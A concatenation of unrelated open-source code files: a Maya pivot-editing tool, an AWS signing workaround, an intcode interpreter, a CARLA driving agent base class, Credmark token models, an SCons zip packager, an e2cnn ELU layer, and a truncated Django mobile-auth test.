# Run the tool in a python shell or shelf button by importing the module,
# and then calling the primary function:
#
# import ml_pivot
# ml_pivot.ui()
#
#
# __________________
# - -/__ Description __/- - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Change the rotate pivot of animated nodes. This is not a pivot switcher, it
# changes the pivot for the whole animation but preserves position by baking
# translation on ones. Eventually I'd like to make it a bit smarter about how it
# bakes.
#
# ____________
# - -/__ Usage __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Run the UI. Select a node whose pivot you'd like to change, and press Edit
# Pivot. Your selection will change to a handle; position this where you'd like the
# pivot to be and press Return. Or press ESC or select something else to cancel.
#
# _________
# - -/__ Ui __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# [Edit Pivot] : Creates a temporary node to position for the new pivot.
# [Reset Pivot] : Reset the rotation pivot to zero.
#
# ___________________
# - -/__ Requirements __/- - - - - - - - - - - - - - - - - - - - - - - - - -
#
# This script requires the ml_utilities module, which can be downloaded here:
# https://raw.githubusercontent.com/morganloomis/ml_tools/master/ml_utilities.py
#
# __________
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /_ Enjoy! _/- - -
__author__ = 'Morgan Loomis'
__license__ = 'MIT'
__revision__ = 4
__category__ = 'animation'
try:
from PySide2 import QtGui, QtCore
import shiboken2 as shiboken
except ImportError:
from PySide import QtGui, QtCore
import shiboken
import maya.OpenMaya as om
import maya.OpenMayaUI as mui
import maya.cmds as mc
try:
import ml_utilities as utl
utl.upToDateCheck(32)
except ImportError:
result = mc.confirmDialog( title='Module Not Found',
message='This tool requires the ml_utilities module. Once downloaded you will need to restart Maya.',
button=['Download Module','Cancel'],
defaultButton='Cancel', cancelButton='Cancel', dismissString='Cancel' )
if result == 'Download Module':
mc.showHelp('http://morganloomis.com/tool/ml_utilities/',absolute=True)
#get maya window as qt object
main_window_ptr = mui.MQtUtil.mainWindow()
qt_maya_window = shiboken.wrapInstance(long(main_window_ptr), QtCore.QObject)
def ui():
'''
user interface for ml_pivot
'''
with utl.MlUi('ml_pivot', 'Change Pivot', width=400, height=150, info='''Select an animated control whose pivot you'd like to change, and press Edit Pivot.
Your selection will change to a handle; position this where you'd like the pivot to be
and press Return. Or press ESC or deselect to cancel.''') as win:
win.buttonWithPopup(label='Edit Pivot', command=edit_pivot, annotation='Creates a temporary node to position for the new pivot.', shelfLabel='pivot', shelfIcon='defaultTwoStackedLayout')
win.buttonWithPopup(label='Reset Pivot', command=reset_pivot, annotation='Reset the rotation pivot to zero.', shelfLabel='reset', shelfIcon='defaultTwoStackedLayout')
def edit_pivot(*args):
context = EditPivotContext()
context.editPivot()
class PivotKeypressFilter(QtCore.QObject):
'''
A qt event filter to catch the enter or escape keypresses.
'''
def __init__(self, enterCommand, escapeCommand):
self.enterCommand = enterCommand
self.escapeCommand = escapeCommand
super(PivotKeypressFilter, self).__init__()
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Return:
with utl.UndoChunk(force=True):
self.enterCommand()
if event.key() == QtCore.Qt.Key_Escape:
self.escapeCommand()
qt_maya_window.removeEventFilter(self)
return False
class EditPivotContext(object):
def __init__(self):
self.node = None
self.pivotHandle = None
self.scriptJob = None
self.keypressFilter = PivotKeypressFilter(self.bakePivot, self.cleanup)
def editPivot(self, *args):
sel = mc.ls(sl=True)
if not sel:
om.MGlobal.displayWarning('Nothing selected.')
return
if len(sel) > 1:
om.MGlobal.displayWarning('Only works on one node at a time.')
return
if mc.attributeQuery('ml_pivot_handle', exists=True, node=sel[0]):
#we have a pivot handle selected
return
self.node = sel[0]
if is_pivot_connected(sel[0]):
driverAttr = pivot_driver_attr(sel[0])
if driverAttr:
self.editPivotDriver(driverAttr)
else:
om.MGlobal.displayWarning('Pivot attribute is connected, unable to edit.')
return
self.editPivotHandle()
def editPivotDriver(self, driver):
self.pivotDriver = driver
#get driver range
node,attr = driver.split('.',1)
value = mc.getAttr(driver)
minValue = mc.attributeQuery(attr, node=node, minimum=True)[0]
maxValue = mc.attributeQuery(attr, node=node, maximum=True)[0]
#create a ui with a slider
self.pivotDriverWindow = 'ml_pivot_editPivotDriverUI'
if mc.window(self.pivotDriverWindow, exists=True):
mc.deleteUI(self.pivotDriverWindow)
window = mc.window(self.pivotDriverWindow, width=1, height=1)
mc.columnLayout()
self.floatSlider = mc.floatSliderButtonGrp(label=attr,
field=True,
value=value,
buttonLabel='Bake',
minValue=minValue,
maxValue=maxValue,
buttonCommand=self.doEditPivotDriver )
mc.showWindow( window )
mc.window(self.pivotDriverWindow, edit=True, width=1, height=1)
def doEditPivotDriver(self, *args):
newValue = mc.floatSliderButtonGrp(self.floatSlider, query=True, value=True)
try:
mc.deleteUI(self.pivotDriverWindow)
except:
pass
currentValue = mc.getAttr(self.pivotDriver)
if newValue == currentValue:
return
oldRP = mc.getAttr(self.node+'.rotatePivot')[0]
mc.setAttr(self.pivotDriver, newValue)
newRP = mc.getAttr(self.node+'.rotatePivot')[0]
mc.setAttr(self.pivotDriver, currentValue)
parentPosition = mc.group(em=True)
offsetPosition = mc.group(em=True)
offsetPosition = mc.parent(offsetPosition, parentPosition)[0]
mc.setAttr(offsetPosition+'.translate', newRP[0]-oldRP[0], newRP[1]-oldRP[1], newRP[2]-oldRP[2])
mc.delete(mc.parentConstraint(self.node, parentPosition))
utl.matchBake(source=[self.node], destination=[parentPosition], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False)
mc.cutKey(self.pivotDriver)
mc.setAttr(self.pivotDriver, newValue)
mc.refresh()
utl.matchBake(source=[offsetPosition], destination=[self.node], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
mc.delete(parentPosition)
def editPivotHandle(self):
qt_maya_window.installEventFilter(self.keypressFilter)
#create transform
self.pivotHandle = mc.group(em=True, name='Adjust_Pivot')
mc.setAttr(self.pivotHandle+'.rotate', lock=True)
mc.setAttr(self.pivotHandle+'.rx', keyable=False)
mc.setAttr(self.pivotHandle+'.ry', keyable=False)
mc.setAttr(self.pivotHandle+'.rz', keyable=False)
mc.setAttr(self.pivotHandle+'.scale', lock=True)
mc.setAttr(self.pivotHandle+'.sx', keyable=False)
mc.setAttr(self.pivotHandle+'.sy', keyable=False)
mc.setAttr(self.pivotHandle+'.sz', keyable=False)
mc.setAttr(self.pivotHandle+'.visibility', lock=True, keyable=False)
mc.setAttr(self.pivotHandle+'.displayHandle', True)
self.pivotHandle = mc.parent(self.pivotHandle, self.node)[0]
mc.addAttr(self.pivotHandle, ln='ml_pivot_handle', at='bool', keyable=False)
#set initial position
mc.setAttr(self.pivotHandle+'.translate', *mc.getAttr(self.node+'.rotatePivot')[0])
#lock it so you don't delete it or something.
mc.lockNode(self.pivotHandle, lock=True)
self.scriptJob = mc.scriptJob(event=['SelectionChanged', self.cleanup], runOnce=True)
mc.setToolTo('Move')
mc.inViewMessage( amg='After moving the pivot, press <hl>Return</hl> to bake or <hl>Esc</hl> to cancel.', pos='midCenterTop', fade=True, fadeStayTime=4000, dragKill=True)
def bakePivot(self):
if not mc.objExists(self.pivotHandle) or not mc.objExists(self.node):
self.cleanup()
return
newPivot = mc.getAttr(self.pivotHandle+'.translate')[0]
if newPivot == mc.getAttr(self.node+'.rotatePivot')[0]:
self.cleanup()
return
if not mc.keyframe(self.node, attribute=('tx','ty','tz','rx','ry','rz'), query=True, name=True):
mc.setAttr(self.node+'.rotatePivot', *newPivot)
self.cleanup()
return
tempPosition = mc.group(em=True)
mc.delete(mc.parentConstraint(self.pivotHandle, tempPosition))
utl.matchBake(source=[self.node], destination=[tempPosition], bakeOnOnes=True, maintainOffset=True, preserveTangentWeight=False, rotate=False)
mc.setAttr(self.node+'.rotatePivot', *newPivot)
utl.matchBake(source=[tempPosition], destination=[self.node], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
mc.delete(tempPosition)
mc.select(self.node)
self.cleanup()
#end context
try:
qt_maya_window.removeEventFilter(self.keypressFilter)
except:
pass
def cleanup(self):
'''
Clean up the mess we made.
'''
try:
mc.lockNode(self.pivotHandle, lock=False)
mc.delete(self.pivotHandle)
except: pass
try:
if mc.scriptJob(exists=self.scriptJob):
mc.scriptJob(kill=self.scriptJob, force=True)
except: pass
pivotHandles = mc.ls('*.ml_pivot_handle', o=True)
if pivotHandles:
for each in pivotHandles:
mc.lockNode(each, lock=False)
mc.delete(each)
def pivot_driver_attr(node):
'''
Start with supporting pivots driven by remap value nodes, more support in the future as requested.
'''
#rpSrc = mc.listConnections(node+'.rotatePivot', source=True, destination=False, plugs=True)
#if rpSrc and rpSrc[0].endswith('.translate') and mc.getAttr(rpSrc[0], keyable=True):
#return rpSrc[0]
for each in ('rotatePivotX', 'rotatePivotY', 'rotatePivotZ'):
src = mc.listConnections(node+'.'+each, source=True, destination=False)
if not src:
continue
srcType = mc.nodeType(src[0])
if srcType == 'remapValue':
src = mc.listConnections(src[0]+'.inputValue', source=True, destination=False, plugs=True)
if src and mc.getAttr(src[0], keyable=True) and not mc.getAttr(src[0], lock=True):
return src[0]
return None
def is_pivot_connected(node):
for each in ('rotatePivot', 'rotatePivotX', 'rotatePivotY', 'rotatePivotZ'):
if mc.listConnections(node+'.'+each, source=True, destination=False):
return True
return False
def reset_pivot(*args):
sel = mc.ls(sl=True)
if not sel:
om.MGlobal.displayWarning('Nothing selected.')
return
if len(sel) > 1:
om.MGlobal.displayWarning('Only works on one node at a time.')
return
node = sel[0]
driver = None
driver_value = None
driver_default = None
if is_pivot_connected(node):
driver = pivot_driver_attr(node)
if driver:
dNode,dAttr = driver.split('.',1)
driver_value = mc.getAttr(driver)
driver_default = mc.attributeQuery(dAttr, node=dNode, listDefault=True)[0]
if driver_default == driver_value:
return
else:
om.MGlobal.displayWarning('Pivot attribute is connected, unable to edit.')
return
if not driver:
pivotPosition = mc.getAttr(node+'.rotatePivot')[0]
if pivotPosition == (0.0,0.0,0.0):
return
tempPosition = mc.group(em=True)
tempPivot = mc.group(em=True)
tempPivot = mc.parent(tempPivot, node)[0]
if driver:
mc.setAttr(driver, driver_default)
newRP = mc.getAttr(node+'.rotatePivot')[0]
mc.setAttr(driver, driver_value)
mc.setAttr(tempPivot+'.translate', *newRP)
else:
mc.setAttr(tempPivot+'.translate', 0,0,0)
mc.setAttr(tempPivot+'.rotate', 0,0,0)
utl.matchBake(source=[tempPivot], destination=[tempPosition], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
if driver:
mc.setAttr(driver, driver_default)
else:
mc.setAttr(node+'.rotatePivot', 0,0,0)
mc.refresh()
utl.matchBake(source=[tempPosition], destination=[node], bakeOnOnes=True, maintainOffset=False, preserveTangentWeight=False, rotate=False)
mc.delete(tempPosition,tempPivot)
mc.select(node)
if __name__ == '__main__':
ui()
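# Scripted use (a minimal sketch; both functions above expect a single animated control
# to be selected in Maya first):
#
# import ml_pivot
# ml_pivot.edit_pivot()   # creates the temporary handle; move it, then press Return to bake
# ml_pivot.reset_pivot()  # or bake the rotate pivot back to zero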
# ______________________
# - -/__ Revision History __/- - - - - - - - - - - - - - - - - - - - - - - -
#
# Revision 1: 2016-06-21 : First publish.
#
# Revision 2: 2017-06-26 : update for pySide2, maya 2017
#
# Revision 3: 2017-07-17 : initial support for attribute driven pivots
#
# Revision 4: 2018-02-17 : Updating license to MIT.
|
the-stack_106_12905
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from requests_aws4auth import AWS4Auth
class AWS4AuthNotUnicode(AWS4Auth):
"""
This is a workaround for
https://github.com/sam-washington/requests-aws4auth/issues/24
These are similar issues:
https://github.com/shazow/urllib3/issues/855
https://github.com/kennethreitz/requests/issues/3177
"""
def __call__(self, req):
req = super(AWS4AuthNotUnicode, self).__call__(req)
req.headers = {
name if isinstance(name, bytes) else name.encode('ascii'):
value if isinstance(value, bytes) else value.encode('ascii')
for name, value in req.headers.items()
}
return req
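# Hedged usage sketch (the credentials, region, and endpoint below are placeholders, not
# part of this module): the subclass plugs into requests exactly like the stock AWS4Auth.
if __name__ == '__main__':
    import requests
    auth = AWS4AuthNotUnicode('<ACCESS_KEY>', '<SECRET_KEY>', 'us-east-1', 'es')
    resp = requests.get('https://search-example.us-east-1.es.amazonaws.com/', auth=auth)
    print(resp.status_code)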
|
the-stack_106_12907
|
import sys
import json
class Pc:
def __init__(self):
self.read_input()
self.instruction_pointer = 0
self.noun = None
self.verb = None
self.result = None
def run(self):
if self.noun is not None:
self.write(1, self.noun)
if self.verb is not None:
self.write(2, self.verb)
while self.instruction_pointer < self.size:
self.fetch()
if self.opcode == 99:
self.result = self.read(0)
return self.result
elif self.opcode == 1:
self.write(self.output, (self.param_a + self.param_b))
elif self.opcode == 2:
self.write(self.output, (self.param_a * self.param_b))
else:
print("bad :(")
sys.exit(255)
def read_input(self):
self.mem = [
int(num)
for line in sys.stdin
for num in line.strip().split(',')
]
self.size = len(self.mem)
self.save_state()
def read(self, address):
return int(self.mem[address])
def deref(self, address):
return self.mem[self.read(address)]
def write(self, address, value):
self.mem[address] = value
def fetch(self):
self.opcode = self.read(self.instruction_pointer)
self.param_a = self.deref(self.instruction_pointer + 1)
self.param_b = self.deref(self.instruction_pointer + 2)
self.output = self.read(self.instruction_pointer + 3)
self.instruction_pointer += 4
def reset(self):
self.instruction_pointer = 0
self.result = None
self.restore_state()
def save_state(self):
self.state = [address for address in self.mem]
def restore_state(self):
self.mem = [address for address in self.state]
def __str__(self):
return json.dumps({
"noun": self.noun,
"verb": self.verb,
"result": self.result
})
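# Hedged usage sketch: a "1202 program alarm"-style run. The noun/verb values are an
# example, not taken from this file; the program itself is read from stdin by read_input().
if __name__ == '__main__':
    pc = Pc()                  # reads the comma-separated intcode program from stdin
    pc.noun, pc.verb = 12, 2   # example patch of addresses 1 and 2 (an assumption)
    pc.run()
    print(pc)                  # JSON with noun, verb and the value left at address 0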
|
the-stack_106_12909
|
#!/usr/bin/env python
# Copyright (c) 2018 Intel Labs.
# authors: German Ros ([email protected])
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
""" This module implements an agent that roams around a track following random
waypoints and avoiding other vehicles.
The agent also responds to traffic lights. """
from enum import Enum
import carla
from agents.tools.misc import is_within_distance_ahead, compute_magnitude_angle
class AgentState(Enum):
"""
AGENT_STATE represents the possible states of a roaming agent
"""
NAVIGATING = 1
BLOCKED_BY_VEHICLE = 2
BLOCKED_RED_LIGHT = 3
class Agent(object):
"""
Base class to define agents in CARLA
"""
def __init__(self, vehicle):
"""
:param vehicle: actor to apply to local planner logic onto
"""
self._vehicle = vehicle
self._world = self._vehicle.get_world()
self._map = self._vehicle.get_world().get_map()
self._last_traffic_light = None
def run_step(self, debug=False):
"""
Execute one step of navigation.
:return: control
"""
control = carla.VehicleControl()
control.steer = 0.0
control.throttle = 0.0
control.brake = 0.0
control.hand_brake = False
control.manual_gear_shift = False
return control
def _is_light_red(self, lights_list):
"""
Method to check if there is a red light affecting us. This version of
the method is compatible with both European and US style traffic lights.
:param lights_list: list containing TrafficLight objects
:return: a tuple given by (bool_flag, traffic_light), where
- bool_flag is True if there is a traffic light in RED
affecting us and False otherwise
- traffic_light is the object itself or None if there is no
red traffic light affecting us
"""
if self._map.name == 'Town01' or self._map.name == 'Town02':
return self._is_light_red_europe_style(lights_list)
else:
return self._is_light_red_us_style(lights_list)
def _is_light_red_europe_style(self, lights_list):
"""
This method is specialized to check European style traffic lights.
:param lights_list: list containing TrafficLight objects
:return: a tuple given by (bool_flag, traffic_light), where
- bool_flag is True if there is a traffic light in RED
affecting us and False otherwise
- traffic_light is the object itself or None if there is no
red traffic light affecting us
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
for traffic_light in lights_list:
object_waypoint = self._map.get_waypoint(traffic_light.get_location())
if object_waypoint.road_id != ego_vehicle_waypoint.road_id or \
object_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
loc = traffic_light.get_location()
if is_within_distance_ahead(loc, ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw,
self._proximity_threshold):
if traffic_light.state == carla.libcarla.TrafficLightState.Red:
return (True, traffic_light)
return (False, None)
def _is_light_red_us_style(self, lights_list, debug=False):
"""
This method is specialized to check US style traffic lights.
:param lights_list: list containing TrafficLight objects
:return: a tuple given by (bool_flag, traffic_light), where
- bool_flag is True if there is a traffic light in RED
affecting us and False otherwise
- traffic_light is the object itself or None if there is no
red traffic light affecting us
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
if ego_vehicle_waypoint.is_intersection:
# It is too late. Do not block the intersection! Keep going!
return (False, None)
if self._local_planner._target_waypoint is not None:
if self._local_planner._target_waypoint.is_intersection:
potential_lights = []
min_angle = 180.0
sel_magnitude = 0.0
sel_traffic_light = None
for traffic_light in lights_list:
loc = traffic_light.get_location()
magnitude, angle = compute_magnitude_angle(loc,
ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw)
if magnitude < 80.0 and angle < min(25.0, min_angle):
sel_magnitude = magnitude
sel_traffic_light = traffic_light
min_angle = angle
if sel_traffic_light is not None:
if debug:
print('=== Magnitude = {} | Angle = {} | ID = {}'.format(sel_magnitude, min_angle, sel_traffic_light.id))
if self._last_traffic_light is None:
self._last_traffic_light = sel_traffic_light
if self._last_traffic_light.state == carla.libcarla.TrafficLightState.Red:
return (True, self._last_traffic_light)
else:
self._last_traffic_light = None
return (False, None)
def _is_vehicle_hazard(self, vehicle_list):
"""
Check if a given vehicle is an obstacle in our way. To this end we take
into account the road and lane the target vehicle is on and run a
geometry test to check if the target vehicle is under a certain distance
in front of our ego vehicle.
WARNING: This method is an approximation that could fail for very large
vehicles, which center is actually on a different lane but their
extension falls within the ego vehicle lane.
:param vehicle_list: list of potential obstacle to check
:return: a tuple given by (bool_flag, vehicle), where
- bool_flag is True if there is a vehicle ahead blocking us
and False otherwise
- vehicle is the blocker object itself
"""
ego_vehicle_location = self._vehicle.get_location()
ego_vehicle_waypoint = self._map.get_waypoint(ego_vehicle_location)
for target_vehicle in vehicle_list:
# do not account for the ego vehicle
if target_vehicle.id == self._vehicle.id:
continue
# if the object is not in our lane it's not an obstacle
target_vehicle_waypoint = self._map.get_waypoint(target_vehicle.get_location())
if target_vehicle_waypoint.road_id != ego_vehicle_waypoint.road_id or \
target_vehicle_waypoint.lane_id != ego_vehicle_waypoint.lane_id:
continue
loc = target_vehicle.get_location()
if is_within_distance_ahead(loc, ego_vehicle_location,
self._vehicle.get_transform().rotation.yaw,
self._proximity_threshold):
return (True, target_vehicle)
return (False, None)
def emergency_stop(self):
"""
Send an emergency stop command to the vehicle
:return:
"""
control = carla.VehicleControl()
control.steer = 0.0
control.throttle = 0.0
control.brake = 1.0
control.hand_brake = False
return control
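# A minimal subclass sketch (not part of the original module) showing how the helpers
# above are typically combined. `_proximity_threshold` is assumed to be supplied by the
# subclass, since the base class references it without defining it; the traffic-light
# check additionally expects a `_local_planner` on non-European maps, so it is omitted here.
class ExampleAgent(Agent):
    def __init__(self, vehicle, proximity_threshold=10.0):
        super(ExampleAgent, self).__init__(vehicle)
        self._proximity_threshold = proximity_threshold  # metres
        self._state = AgentState.NAVIGATING

    def run_step(self, debug=False):
        # stop for any vehicle blocking our lane, otherwise fall back to the base control
        vehicle_list = self._world.get_actors().filter('vehicle.*')
        hazard, _ = self._is_vehicle_hazard(vehicle_list)
        if hazard:
            self._state = AgentState.BLOCKED_BY_VEHICLE
            return self.emergency_stop()
        self._state = AgentState.NAVIGATING
        return super(ExampleAgent, self).run_step(debug)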
|
the-stack_106_12910
|
# pylint: disable=locally-disabled, unused-import
from typing import List
from credmark.cmf.model import Model
from credmark.cmf.model.errors import ModelDataError
from credmark.cmf.types import (
Token,
Price,
Contract,
Accounts,
Contracts,
)
from credmark.dto import DTO, IterableListGenericDTO
@Model.describe(
slug="token.info",
version="1.0",
display_name="Token Information",
developer="Credmark",
input=Token,
output=Token
)
class TokenInfoModel(Model):
"""
Return token's information
"""
def run(self, input: Token) -> Token:
return input.info
@Model.describe(slug='token.holders',
version='1.0',
display_name='Token Holders',
description='The number of holders of a Token',
input=Token,
output=dict)
class TokenHolders(Model):
def run(self, _input: Token) -> dict:
# TODO: Get Holders
return {"result": 0}
@Model.describe(slug='token.swap-pools',
version='1.0',
display_name='Swap Pools for Token',
description='All swap pools available for the current Token',
input=Token,
output=Contracts)
class TokenSwapPools(Model):
def run(self, input: Token) -> Contracts:
response = Contracts(contracts=[])
response.contracts.extend(Contracts(**self.context.models.uniswap_v3.get_pools(input)))
response.contracts.extend(Contracts(**self.context.models.uniswap_v2.get_pools(input)))
response.contracts.extend(Contracts(**self.context.models.sushiswap.get_pools(input)))
return response
@Model.describe(slug='token.swap-pool-volume',
version='1.0',
display_name='Token Volume',
description='The current volume for a swap pool',
input=Contract,
output=dict)
class TokenSwapPoolVolume(Model):
    def run(self, input: Contract) -> dict:
# TODO: Get All Credmark Supported swap Pools for a token
return {"result": 0}
@Model.describe(slug='token.overall-volume',
version='1.0',
display_name='Token Volume',
description='The Current Credmark Supported trading volume algorithm',
input=Token,
output=dict)
class TokenVolume(Model):
    def run(self, input: Token) -> dict:
# TODO: Get Overall Volume
return {"result": 0}
class CategorizedSupplyRequest(IterableListGenericDTO):
class CategorizedSupplyCategory(DTO):
accounts: Accounts
categoryName: str
categoryType: str = ''
circulating: bool = False
categories: List[CategorizedSupplyCategory]
_iterator: str = 'categories'
token: Token
class CategorizedSupplyResponse(CategorizedSupplyRequest):
class CategorizedSupplyCategory(CategorizedSupplyRequest.CategorizedSupplyCategory):
amountScaled: float = 0.0
valueUsd: float = 0.0
categories: List[CategorizedSupplyCategory]
_iterator: str = 'categories'
circulatingSupplyScaled: float = 0.0
circulatingSupplyUsd: float = 0.0
@Model.describe(slug='token.categorized-supply',
version='1.0',
display_name='Token Categorized Supply',
description='The categorized supply for a token',
input=CategorizedSupplyRequest,
output=CategorizedSupplyResponse)
class TokenCirculatingSupply(Model):
def run(self, input: CategorizedSupplyRequest) -> CategorizedSupplyResponse:
response = CategorizedSupplyResponse(**input.dict())
total_supply_scaled = input.token.scaled(input.token.total_supply)
token_price = Price(**self.context.models.token.price(input.token))
        if token_price.price is None:
            raise ModelDataError(f"No Price for {response.token}")
for c in response.categories:
for account in c.accounts:
bal = response.token.functions.balanceOf(account.address).call()
c.amountScaled += response.token.scaled(bal)
if token_price is not None and token_price.price is not None:
c.valueUsd = c.amountScaled * token_price.price
response.categories.append(CategorizedSupplyResponse.CategorizedSupplyCategory(
accounts=Accounts(accounts=[]),
categoryName='uncategorized',
categoryType='uncategorized',
circulating=True,
amountScaled=total_supply_scaled - sum([c.amountScaled for c in response.categories])
))
response.circulatingSupplyScaled = sum(
[c.amountScaled for c in response.categories if c.circulating])
if isinstance(token_price.price, float):
if isinstance(response.circulatingSupplyScaled, float):
response.circulatingSupplyUsd = response.circulatingSupplyScaled * token_price.price
return response
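# Illustrative sketch (not part of the original file): from inside another Credmark model,
# the models defined above are reachable through the context runner, mirroring the calls
# already used in TokenSwapPools and TokenCirculatingSupply. The token address below is a
# placeholder, not a real input from this file.
#
#   info = Token(**self.context.models.token.info({"address": "0x..."}))
#   pools = Contracts(**self.context.models.token.swap_pools({"address": "0x..."}))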
|
the-stack_106_12913
|
"""SCons.Tool.Packaging.zip
The zip SRC packager.
"""
#
# Copyright (c) 2001 - 2019 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/packaging/zip.py 72ae09dc35ac2626f8ff711d8c4b30b6138e08e3 2019-08-08 14:50:06 bdeegan"
from SCons.Tool.packaging import stripinstallbuilder, putintopackageroot
def package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Zip']
bld.set_suffix('.zip')
target, source = stripinstallbuilder(target, source, env)
target, source = putintopackageroot(target, source, env, PACKAGEROOT)
return bld(env, target, source)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
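# Illustrative sketch (not part of the original module): this packager is normally reached
# through the SCons packaging tool rather than imported directly; a SConstruct along these
# lines (names and paths are placeholders) routes PACKAGETYPE='zip' to package() above.
#
#   env = Environment(tools=['default', 'packaging'])
#   files = env.Install('/usr/local/bin', 'my_program')
#   env.Package(NAME='my_program', VERSION='1.0', PACKAGETYPE='zip', source=files)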
|
the-stack_106_12914
|
from e2cnn.gspaces import *
from e2cnn.nn import FieldType
from e2cnn.nn import GeometricTensor
from ..equivariant_module import EquivariantModule
import torch
import torch.nn.functional as F
from typing import List, Tuple, Any
import numpy as np
__all__ = ["ELU"]
class ELU(EquivariantModule):
def __init__(self, in_type: FieldType, alpha: float = 1.0, inplace: bool = False):
r"""
        Module that applies a pointwise ELU to every channel independently.
The input representation is preserved by this operation and, therefore, it equals the output
representation.
Only representations supporting pointwise non-linearities are accepted as input field type.
Args:
in_type (FieldType): the input field type
alpha (float): the :math:`\alpha` value for the ELU formulation. Default: 1.0
inplace (bool, optional): can optionally do the operation in-place. Default: ``False``
"""
assert isinstance(in_type.gspace, GeneralOnR2)
super(ELU, self).__init__()
for r in in_type.representations:
assert 'pointwise' in r.supported_nonlinearities, \
'Error! Representation "{}" does not support "pointwise" non-linearity'.format(r.name)
self.space = in_type.gspace
self.in_type = in_type
self.alpha = alpha
# the representation in input is preserved
self.out_type = in_type
self._inplace = inplace
def forward(self, input: GeometricTensor) -> GeometricTensor:
r"""
Applies ELU function on the input fields
Args:
input (GeometricTensor): the input feature map
Returns:
the resulting feature map after elu has been applied
"""
assert input.type == self.in_type
return GeometricTensor(F.elu(input.tensor, alpha=self.alpha, inplace=self._inplace), self.out_type)
def evaluate_output_shape(self, input_shape: Tuple[int, int, int, int]) -> Tuple[int, int, int, int]:
assert len(input_shape) == 4
assert input_shape[1] == self.in_type.size
b, c, hi, wi = input_shape
return b, self.out_type.size, hi, wi
def check_equivariance(self, atol: float = 1e-6, rtol: float = 1e-5) -> List[Tuple[Any, float]]:
c = self.in_type.size
x = torch.randn(3, c, 10, 10)
x = GeometricTensor(x, self.in_type)
errors = []
for el in self.space.testing_elements:
out1 = self(x).transform_fibers(el)
out2 = self(x.transform_fibers(el))
errs = (out1.tensor - out2.tensor).detach().numpy()
errs = np.abs(errs).reshape(-1)
print(el, errs.max(), errs.mean(), errs.var())
assert torch.allclose(out1.tensor, out2.tensor, atol=atol, rtol=rtol), \
'The error found during equivariance check with element "{}" is too high: max = {}, mean = {} var ={}' \
.format(el, errs.max(), errs.mean(), errs.var())
errors.append((el, errs.mean()))
return errors
def extra_repr(self):
return 'alpha={}, inplace={}, type={}'.format(
self.alpha, self._inplace, self.in_type
)
def export(self):
r"""
Export this module to a normal PyTorch :class:`torch.nn.ELU` module and set to "eval" mode.
"""
self.eval()
return torch.nn.ELU(alpha=self.alpha, inplace=self._inplace)
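# Illustrative usage sketch (not part of the original module): builds a small rotation-
# equivariant field type and applies the ELU defined above to a random geometric tensor.
if __name__ == "__main__":
    gspace = Rot2dOnR2(N=8)
    feat_type = FieldType(gspace, 3 * [gspace.regular_repr])
    elu = ELU(feat_type, alpha=1.0)
    x = GeometricTensor(torch.randn(4, feat_type.size, 16, 16), feat_type)
    y = elu(x)
    print(y.tensor.shape)  # torch.Size([4, 24, 16, 16])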
|
the-stack_106_12917
|
from __future__ import absolute_import
from __future__ import unicode_literals
from datetime import datetime, timedelta
from django.test import TestCase
from casexml.apps.case.tests.util import check_xml_line_by_line
from corehq.apps.mobile_auth.utils import new_key_record, get_mobile_auth_payload
from dimagi.ext.jsonobject import HISTORICAL_DATETIME_FORMAT
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import CommCareUser
class MobileAuthTest(TestCase):
def setUp(self):
self.now = datetime.utcnow()
self.domain_name = 'test'
self.domain = create_domain(self.domain_name)
self.username = 'test-user'
self.password = 'awesome'
self.commcare_user = CommCareUser.create(self.domain_name, self.username, self.password)
self.user_id = self.commcare_user.get_id
def tearDown(self):
self.commcare_user.delete()
@staticmethod
def format_datetime_no_usec(dt):
# phone handler can't deal with microseconds
return dt.strftime(HISTORICAL_DATETIME_FORMAT)
def test_xml(self):
now_plus_30 = self.now + timedelta(days=30)
now_minus_30 = self.now - timedelta(days=30)
record = new_key_record(None, None, now=self.now)
xml = get_mobile_auth_payload([record], self.domain_name, now=self.now)
check_xml_line_by_line(self, xml, """
<OpenRosaResponse xmlns="http://openrosa.org/http/response">
<message nature="submit_success">Here are your keys!</message>
<auth_keys domain="{domain}" issued="{now}">
<key_record valid="{now}" expires="{now_plus_30}">
<uuid>{record.uuid}</uuid>
